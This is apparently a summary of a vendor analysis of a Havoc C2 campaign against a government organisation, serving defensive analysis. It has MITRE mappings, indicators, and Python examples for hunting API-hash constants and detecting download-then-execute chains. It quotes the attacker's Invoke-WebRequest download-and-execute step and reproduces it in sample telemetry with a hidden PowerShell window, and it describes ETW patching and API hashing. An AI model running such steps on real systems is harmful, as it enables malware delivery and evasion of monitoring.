Zscaler ThreatLabz researchers analyzed a government-targeting campaign that uses Havoc, an open-source post-exploitation C2 framework, to blend evasive techniques with multi-stage delivery and execution. The operation leverages a downloader chain, a signed shellcode loader, and a memory-mapped Demon DLL to run covert commands against the infected host. #HavocFramework #HavocDemon
Keypoints
- New threat campaign targets a government organization using the Havoc C2 framework.
- The Havoc Demon implant is delivered via a multi-stage chain starting with a ZIP archive (ZeroTwo.zip) containing character.scr and Untitled Document.docx.
- The downloader (character.scr) decrypts an embedded BAT script, which downloads pics.exe (the Shellcode Loader), saves it to Temp and executes it; it also downloads images.jpg as a decoy to conceal the activity.
- The Shellcode Loader is signed with a Microsoft digital certificate; it disables ETW by patching the first bytes of EtwEventWrite, then AES-decrypts the embedded shellcode and runs it through a CreateThreadpoolWait callback.
- KaynLdr reflectively loads the Havoc Demon DLL, resolving NTAPI addresses by hashing export names with a modified DJB2 algorithm; the Demon DLL uses Sleep Obfuscation and indirect syscalls.
- Campaign infrastructure reveals domain ttwweatterarartgea.ga and an IP 146.190.48.229, including an open directory with logs and Metasploit screenshots.
- Sandbox coverage notes Win64.Backdoor.HavocC2 detection and highlights the broader need for robust defense.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The final payload is downloaded from http[:]//146[.]190[.]48[.]229/pics.exe with Invoke-WebRequest, saved to Temp as seethe.exe, and then launched with `start seethe.exe`. “downloads the final payload from http[:]//146[.]190[.]48[.]229/pics.exe and saves it as ‘seethe.exe’ in the Temp folder via Invoke-WebRequest and then executes it using ‘start seethe.exe’”.
- [T1059.001] PowerShell – Invoke-WebRequest is used to fetch the final payload as part of the downloader chain. “downloads the final payload from http[:]//146[.]190[.]48[.]229/pics.exe … via Invoke-WebRequest”.
- [T1059.003] Windows Command Shell – The downloader, built with BAT2EXE, decrypts a Batch script that is written to and executed from Temp. “The BAT2EXE argument can be seen in the downloader binary” and “the decrypted BAT Script upon execution … writes and executes the decrypted BAT script from the Temp folder”.
- [T1553.002] Subvert Trust Controls: Code Signing – The Shellcode Loader carries a Microsoft digital signature so that it appears trusted. (T1218.005 is Mshta, which does not apply here.) “Shellcode Loader is signed using Microsoft’s Digital certificate”.
- [T1106] Native API – KaynLdr resolves the virtual addresses of NTAPI functions by hashing names in the export table with a modified DJB2 algorithm and comparing against precomputed hashes. “the API Hashing routine … using modified DJB2 hashing algorithm”.
- [T1562.001] Impair Defenses: Disable or Modify Tools – The first 4 bytes of EtwEventWrite are patched so that Event Tracing for Windows can no longer emit events. “patches the first 4 bytes of the EtwEventWrite … ETW will not be able to write any events thus disabling the ETW”.
- [T1055] Process Injection – The decrypted shellcode is executed in memory by registering its address as a CreateThreadpoolWait callback; note that this runs inside the loader’s own process rather than injecting into another one. “Shellcode is executed via CreateThreadpoolWait … the callback function is set to the address of the shellcode”.
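The export-name hashing that KaynLdr relies on (Keypoints and T1106 above) is easy to reproduce for analysis. The following is an added example, not code from the Zscaler write-up or from Havoc: it uses classic DJB2 (seed 5381, h = h*33 + c, truncated to 32 bits) because the exact modification Havoc applies is not given on this page, so the constant values are an assumption; the export names are a constructed sample, not a real ntdll export table.

```python
# Added example (not Havoc or Zscaler code): how an API-hashing loader maps
# precomputed 32-bit constants back to export names, and how a defender can
# reuse the same hash to hunt for those constants in a suspect binary.
# ASSUMPTION: classic DJB2. Havoc's "modified DJB2" differs in details not on this page.
from typing import Dict, Iterable, List, Optional


def djb2(name: bytes, seed: int = 5381) -> int:
    """Classic DJB2 over a byte string, truncated to 32 bits like a loader would."""
    h = seed
    for c in name:
        h = ((h << 5) + h + c) & 0xFFFFFFFF  # h * 33 + c
    return h


def build_hash_table(export_names: Iterable[bytes]) -> Dict[int, bytes]:
    """Hash every export name, as a loader walking the export table does.
    Refuses silently ambiguous tables: a collision would resolve the wrong API."""
    table: Dict[int, bytes] = {}
    for n in export_names:
        h = djb2(n)
        if h in table and table[h] != n:
            raise ValueError(f"hash collision {h:#010x}: {table[h]!r} vs {n!r}")
        table[h] = n
    return table


def resolve_by_hash(export_names: Iterable[bytes], target: int) -> Optional[bytes]:
    """Loader side: find the export whose hash equals a hard-coded constant."""
    return build_hash_table(export_names).get(target)


def hash_constants_present(blob: bytes, names: Iterable[bytes]) -> List[bytes]:
    """Analyst side: which sensitive exports have their DJB2 constant embedded
    (little-endian DWORD) somewhere in the sample?"""
    return [n for n in names if djb2(n).to_bytes(4, "little") in blob]


# Constructed sample export list (a real ntdll has thousands of names).
SAMPLE_EXPORTS = [
    b"NtAllocateVirtualMemory",
    b"NtProtectVirtualMemory",
    b"NtCreateThreadEx",
    b"LdrLoadDll",
    b"RtlAddFunctionTable",
]

if __name__ == "__main__":
    for n in SAMPLE_EXPORTS:
        print(f"{djb2(n):#010x}  {n.decode()}")
    # Constructed "binary" containing one of those constants among junk bytes.
    fake_blob = b"\x00" * 8 + djb2(b"LdrLoadDll").to_bytes(4, "little") + b"MZ\x90\x00"
    print("constants found:", hash_constants_present(fake_blob, SAMPLE_EXPORTS))
```

Searching a sample for the constants of NtAllocateVirtualMemory, NtProtectVirtualMemory and similar is only a starting point: a loader that uses a modified hash, a different seed, or per-sample keying will not match, which is exactly why Havoc tweaks the algorithm. Run the table above against the real variant once you have recovered it from the sample.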
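The delivery chain mapped to T1105, T1059.001 and T1059.003 above (cmd.exe running a Batch script from Temp, PowerShell fetching an executable into Temp with Invoke-WebRequest, then the new file being started) is visible in ordinary process-creation telemetry. The following detection is an added example, not Zscaler's or Havoc's code, and runs over constructed events (the process IDs, the user path and the 192.0.2.10 download host are made up); it correlates a PowerShell download whose -OutFile lands in a Temp directory with a later process creation of that same file.

```python
# Added example (not Zscaler or Havoc code): correlate "PowerShell downloads a
# file into Temp" with "that file is later executed" across process-creation
# events. Event shape and sample data are constructed for this example.
import re
from typing import Dict, List

TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
OUTFILE = re.compile(r"-OutFile\s+\"?([^\s\"]+)", re.IGNORECASE)
DOWNLOAD_CMDLET = re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.IGNORECASE)


def detect_download_then_execute(events: List[Dict], window_s: int = 300) -> List[Dict]:
    """Return one alert per (download event, execution event) pair where
    PowerShell wrote an -OutFile into a Temp directory and a process was later
    created from that exact path within window_s seconds."""
    events = sorted(events, key=lambda e: e["ts"])
    pending = {}  # lower-cased output path -> download event
    alerts = []
    for ev in events:
        image = ev["image"].lower()
        cmd = ev["cmdline"]
        if image.endswith(("powershell.exe", "pwsh.exe")) and DOWNLOAD_CMDLET.search(cmd):
            m = OUTFILE.search(cmd)
            if m and TEMP_DIR.search(m.group(1)):
                pending[m.group(1).lower()] = ev
        dl = pending.get(image)
        if dl and 0 <= ev["ts"] - dl["ts"] <= window_s:
            alerts.append({
                "download_pid": dl["pid"],
                "exec_pid": ev["pid"],
                "path": ev["image"],
                "same_parent": dl["ppid"] == ev["ppid"],  # both spawned by the same cmd.exe
            })
    return alerts


# Constructed sample telemetry mirroring the chain described in the write-up.
SAMPLE_EVENTS = [
    {"ts": 0, "pid": 1000, "ppid": 900, "image": r"C:\Users\u\Downloads\character.scr", "cmdline": "character.scr"},
    {"ts": 1, "pid": 1001, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\stage.bat"},
    {"ts": 2, "pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c Invoke-WebRequest http://192.0.2.10/pics.exe -OutFile C:\Users\u\AppData\Local\Temp\seethe.exe"},
    {"ts": 4, "pid": 1003, "ppid": 1001, "image": r"C:\Users\u\AppData\Local\Temp\seethe.exe", "cmdline": "seethe.exe"},
    # Benign: an admin script downloading a report into Documents, never executed.
    {"ts": 5, "pid": 2000, "ppid": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest https://reports.example/r.csv -OutFile C:\Users\u\Documents\r.csv"},
]

if __name__ == "__main__":
    for a in detect_download_then_execute(SAMPLE_EVENTS):
        print(a)
```

The `same_parent` flag is worth keeping in the alert: in this campaign both the PowerShell download and the `start seethe.exe` are children of the cmd.exe running the decrypted Batch script, which separates the chain from a user who downloads a file and double-clicks it later from Explorer.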
Indicators of Compromise
- [IP] 146.190.48.229 – C2/download host for the final payload; referenced repeatedly in the campaign infrastructure (pics.exe delivery and domain mapping).
- [Domain] ttwweatterarartgea.ga – hosts an open directory containing payloads, logs, and Metasploit screenshots; used for payload download and tracking data.
- [Hash] pics.exe – 5be4e5115cdf225871a66899b7bc5861 (MD5)
- [Hash] image.exe – bfa5f1d8df27248d840d1d86121f2169 (MD5)
- [File name] ZeroTwo.zip – ZIP archive containing character.scr and Untitled Document.docx.
- [File name] character.scr – downloader component in the ZIP archive.
- [File name] Untitled Document.docx – document used as lure in the ZIP archive.
Read more: https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace